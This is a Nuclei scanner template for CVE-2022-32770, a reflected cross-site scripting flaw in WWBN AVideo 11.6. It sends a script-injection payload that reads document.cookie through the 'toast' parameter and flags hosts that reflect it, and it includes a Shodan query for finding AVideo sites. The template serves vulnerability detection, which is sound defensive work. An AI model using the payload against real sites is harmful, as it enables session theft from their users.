nuclei-templates/cves/2022/CVE-2022-32770.yaml

33 lines
1.0 KiB
YAML

id: CVE-2022-32770
info:
name: WWBN AVideo 11.6 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
description: |
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "toast" parameter which is inserted into the document with insufficient sanitization.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32770
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
metadata:
shodan-query: http.html:"AVideo"
verified: "true"
tags: xss,cve,2022, avideo,wwbn
requests:
- raw:
- |
GET /index.php?toast=</script><script>alert(document.cookie);</script> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.cookie);</script>'